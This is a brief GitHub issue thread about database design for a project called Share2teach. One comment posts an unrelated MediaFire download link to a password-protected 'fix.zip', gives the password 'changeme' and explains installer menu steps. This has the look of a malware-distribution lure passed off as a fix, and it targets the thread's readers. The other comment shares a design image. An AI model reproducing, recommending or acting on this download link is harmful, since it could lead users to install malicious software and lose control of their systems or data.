### ISSUE TITLE
Database Design

### ISSUE THREAD

**Issue by navardm** [navardm/Share2teach#12]

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Schoonie1810** [comment]
![Image](https://github.com/user-attachments/assets/4efc909b-2037-4e90-82cd-54165b70da17)

DESIGN FINAL DRAFT
